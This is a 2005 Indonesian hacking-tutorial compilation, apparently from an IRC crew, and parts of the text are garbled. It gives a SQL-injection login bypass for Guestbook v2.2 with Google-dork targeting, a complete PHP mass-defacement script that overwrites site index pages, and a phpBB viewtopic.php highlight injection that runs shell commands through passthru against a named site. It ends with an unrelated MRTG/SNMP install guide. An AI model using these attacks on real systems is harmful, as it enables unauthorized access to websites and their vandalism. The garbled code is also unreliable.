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Le téléchargement nécessite un accès à la bibliothèque YouScribe Tout savoir sur nos offres








Le téléchargement nécessite un accès à la bibliothèque YouScribe Tout savoir sur nos offres

TUTORIAL HACKINGKOMUNITAS #SOLOHACKERLINKA L L ne t + Daln et1Kumpulan tu torial ini ka mi persembahkan bagi an da yang ingin belajar H acking, Defacing,Cracking, dan yang be rhubungan dengan du nia K omputer.Tapi Ingat K ami Tidak Ber tanggung Jawa b Atas Pe nyalah Gunaan Ar tikel Ini.-ChanS er v- Channel: #solohackerlink-ChanS er v- F ound er : PeNc OpEt_CiNtA, las t seen: 5 d ays (0 h 40m 1s) ago-ChanS er v- Succ essor: POM _PON K << ONL IN E >>-ChanS er v- Re gist er ed: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003 )-ChanS er v- L as t Used: 0 se conds ago-ChanS er v- Topi c: [ www.s ol ohackerlink. cool.to Kirimkan tu tori al k-mu disini ] Selama tMe nunaikan Ibadah Syaum-ChanS er v- Email: soloh ackerl ink@gma il.com-ChanS er v- U rl: www.soloh ackerl ink.s.to-ChanS er v- Options: Topi cL ock, Secu reOps, Priva te, SplitOps, Verbos e-ChanS er v- Mod e Lock: -iApabila ada pe rtanyaan silahkan me ngubungi teman-teman ka mi yang sedang online di serverallnetwork at au dalnet dengan chan nel #SOLOHACKERLINKSolohackerlink@gmail. comGuestbook 2.2 vuln erabilties Gues tbook v2.2 vu lne ra bilities Dat e: Thu rsd ay, Apr il 28, 2005 H its: 3413 B y: POM _PONK Gues tbook v2,2 mas ih bisa di ha ck,dengan sedikit k es abar an d an k eul et an ka lian bis a j adi- a dmindiw ebs ite yang ada gues tbookn ya. Kali an bisa add dan me nde lete isi dar i gue stbook te rsebut. ta pi ingat jang an merus ak ...
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Kumpulan tutorial ini kami persembahkan bagi anda yang ingin belajar Hacking, Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ- Channel: #solohackerlink -ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago -ChanServ- Successor: POM PONK << ONLINE >> _ -ChanServ Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003) --ChanServ- Last Used: 0 seconds ago -ChanServ- Topic: [ www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ] Selamat  Menunaikan Ibadah Syaum -ChanServ- Email: solohackerlink@gmail.com -ChanServ- Url: www.solohackerlink.s.to -ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose -ChanServ- Mode Lock: -i
Apabila ada pertanyaan silahkan mengubungi teman-teman kami yang sedang online di server allnetwork atau dalnet dengan channel #SOLOHACKERLINK
Guestbook 2.2 vulnerabilties
Guestbook v2.2 vulnerabilities Date: Thursday, April 28, 2005 Hits: 3413 By: POM_PONK
Guestbook v2,2 masih bisa di hack,dengan sedikit kesabaran dan keuletan kalian bisa jadi- admin diwebsite yang ada guestbooknya.
Kalian bisa add dan mendelete isi dari guestbook tersebut. tapi ingat jangan merusak,cukup tau aja dee gak usah merusak.kata um s´to” lebih mudah merusak dari pada membangun”
Ok!!! langsung kepermasalahan seperti biasa kita panggil paman google.com
Keyword in google.com site:. ex: ".com.my/guestbook/admin.php" ketemukan targetnya...(kalo gak ketemu mampus aja dee...cuihh) misal: www.pomponk.org/guestbook/admin.php Tinggal login aja ntu...
Username: (kosong) Password: ´) OR (´ ´ ´  a = a  nah kalo berhasil lu langsung jadi admin di guestbook tsb. Dah sampai disini aja ….tinggal kreasi temen2 aja.mo diapain terserah. “Tanggung Jawab Ditanggung Sendiri”
Mohon maaf kalo ada kesalahan…..
Special thank’s to J4mbi H4ck3r + PeNcOpEt_CiNtA
All crew #solohackerlink alnetwork Bamby,sawex,Garam,ferdi,cupid,knopix,ska,|zell, KiluaGanK,Sandegang,jembuat,
Bobmarley, gukong etc.
Buat channel tetangga #Newbie #Neraka #uh-oh – allnet.
#Jambihackerlink #Malanghackerlink – dalnet.
_ Oleh: POM PONK #solohackerlink-crew
Post by : POM PONK on [ 22 October 2005 10:50:24 ] _
// X:>php - q phpmass.php // // // PHP Web Mass Defacement Tools // -------------------------------// For Security Research Only
Scripts Mass Depface
// // // Theis tools will create a file page for default homepage (www) // on specified folder/path.But must have permission writable (w+) // You must to setup folder/path to show directory ($path) // Before use this tool,upload first into a site writable/vulnerable perms. // // Author: basher13(basher13@linuxmail.org) // Published Date:19:37:41 Saturday, June 04, 2005 //
echo " "; echo " "; ====================================== echo " PHP Web Mass Defacement Tools "; echo " ====================================== "; echo " basher13 - Infam0us Gr0up "; echo " ";   echo " ; "
echo "[+] .. "; $path = "usr/www/html"; // Path to show directory list (eg;var/www/html)
echo "[+] CHMOD 644 $path.."; chmod ("$path", 0644); echo "[OK] ; "
echo "[+] Copying and backup for files.. ; " // Prepare to backup/copy files $file = "index.htm"; if (!copy($file, $file.´.bak´)) { print ("[-] failed to copy $file... "); } $file = "index.html";
if (!copy($file, $file.´.bak´)) { print ("[-] failed to copy $file... "); } $file = "index.php"; if (!copy($file, $file.´.bak´)) { print ("[-] failed to copy $file... "); } $file = "index.asp";   if (!copy($file, $file.´.bak´)) { print ("[-] failed to copy $file... "); } $file = "index.cfm"; if (!copy($file, $file.´.bak´)) { print ("[-] failed to copy $file... "); }
echo "[+] List of IP addresses: "; $hosts = gethostbynamel(´localhost´); print_r($hosts);
echo " "; echo "[+] Current directory list : ";
if ($handle = opendir(´.´)) { while (false !== ($file = readdir($handle))) { if ($file != "." && $file != "..") { echo "$file ";  } } closedir($handle); } echo " "; echo "[+] Directory list ´$path´: ";
if (is_dir($path)) { if ($dh = opendir($path)) { while (($file = readdir($dh)) !== false) { print "filename: $file : filetype: " . filetype($path . $file) . " "; } closedir($dh); } }
echo " ";  echo "[+] Now attacking "; $ip = gethostbyname(´localhost´); print $ip; echo ".. "; echo "[+] Building page extension..";
$fp1 = fopen("index.htm", "w+"); // Writting and create a page extention (eg;www/html/index.htm) $fp2 = fopen("index.html", "w+"); $fp3 = fopen("index.php", "w+"); $fp4 = fopen("index.asp", "w+"); $fp5 = fopen("index.cfm", "w+"); $fp6 = fopen("index.bak", "w+"); $fp7 = fopen("HELP.txt", "w+");
echo "[DONE] "; echo "[+] Set text defacement..";
// Text input use whit javascript $msg = "<html><head><title>GO PATCH THE SYSTEM! </title><meta name=keywords content=ads,advertise,banner,logo,art,anime,images , picture,graphic,basher13,hacked,deface,hacking,0d ay,security,hacker,program,tools,exploit,vulnerabi lity,bugs,intrusion,infam0us gr0up,INFGP,INFAMOUS GROUP></head><body bgcolor=#000000
text=#CCCCCC><div align=center><p align=center><font size=7 face=Courier><strong>SISTEM SERVER HACKED</strong></font><br><strong><font size=3 face=Arial, Helvetica, sans-serif>by</font></strong></p><p align=center><img src=http://k.domaindlx.com/shellcore/basher13.gif width=100 height=95></p><p align=center><font color=#FFFF00 size=3 face=Arial, Helvetica, sans-serif><strong>basher13</strong></font></p><div align=center><font size=2 face=Arial, Helvetica, sans-serif>Infos: [basher13@linuxmail.org] -[www.98.to/infamous]</font></p></div></div></body></html>"; echo "[DONE] ";
echo "[+] Sending bugs writable [w+].. ";
echo "[+] Create index.htm.."; if (flock($fp1, LOCK_EX)) { fwrite($fp1, $msg); flock($fp1, LOCK_UN); echo [OK] "; "
} " + echo [ ] Create index.html.."; if (flock($fp2, LOCK_EX)) { fwrite($fp2, $msg); flock($fp2, LOCK_UN); echo "[OK] "; } echo "[+] Create index.php "; .. if (flock($fp3, LOCK_EX)) { fwrite($fp3, $msg); flock($fp3, LOCK_UN); echo "[OK] "; } echo "[+] Create index.asp.."; if (flock($fp4, LOCK_EX)) { fwrite($fp4, $msg);
flock($fp4, LOCK UN); _ echo "[OK] "; } echo "[+] Create index.cfm. "; . if (flock($fp5, LOCK_ )) { EX fwrite($fp5, $msg); flock($fp5, LOCK_ N) U ; echo "[OK] ; " } echo "[+] Create index.bak.. ; " if (flock($fp6, LOCK_EX)) { fwrite($fp6, $msg); flock($fp6, LOCK_UN); echo "[OK] "; } if (flock($fp7, LOCK_EX)) { fwrite($fp7, "http://n.domaindlx.com/shellcore/security.asp"); flock($fp7, LOCK_UN);
echo " ";
echo "[+] Sending bugs..[DONE]!! "; echo "[*] tEh ziteS hAS being 0wned! "; echo " "; echo "------------------------------------------------------------------ ;  " echo " + Infos:[basher13@linuxmail.org]-[www.98.to/infamous] + "; echo "------------------------------------------------------------------ "; }else { echo " "; echo "[!] [FAILED] Permission is not writable!! "; echo " "; echo "------------------------------------------------------------------ ; "  echo " + Infos:[solohackerlinks@yahoo.com]-[www.solohackerlink.org] + ";
----------------echo "---------------------------------------------- ---- "; }
chmod ("$path", 0755);
fclose($fp1); fclose($fp2); fclose($fp3); fclose($fp4); fclose($fp5); fclose($fp6); fclose($fp7);
Post by : POM_PONK on [ 13 October 2005 13:14:18 ]
.:: Inject phpBB Forum ::.
.:: Inject phpBB Forum ::. Mungkin bagi anda yang sudah mahir command ini sudah kuno tapi alangkah baiknya bila ini di pelajari lagi
Langkah pertama kita cari target web dengan fasilitas phpBB dengan paman google hihihihi :P
kata kunci "Powered by phpBB 2.0.6" atau yang sebagainya
contoh kita dapat situs
sebelumnya minta maaf ya pada admin webnya
terus kita inject dengan command
jadi di gabung
http://infoka.kereta-api.com/forum/viewtopic.php?t=41&highlight=%2527.passthru ($HTTP_GET VARS[a]).%2527&a=ls _
yang paling belakang command console nya
kalo ada kesalahan mohon di maapin ok dab aku pulang doeloe tha tha
Post by : BaMBY on [ 04 October 2005 06:23:26 ]
############################ ###INSTALL CONFIGURE MRTG### ############################
1.zlib install download zlib-1.2.2.tar.gz tar -zxvf zlib-1.2.2.tar.gz ./configure prefix=/usr/zlib --make make install
2.gd install download gd-2.0.11.tar.gz tar -zxvf gd-2.0.11.tar.gz ./configure --prefix=/usr/gd make make install
3. INSTALL SNMPD ./configure --prefix=/usr/snmpd make && umask 022 && make install
cd /usr/snmpd/bin/ pico snmpd.conf #==========###=====================# syslocation "Under Sky " syscontact administrator@xxx.xxx rwcommunity terserah localhost rwcommunity terserah 202.x.x.x rwcommunity terserah #==========###=====================# 
cp snmpd.conf /usr/snmpd/share/snmp/
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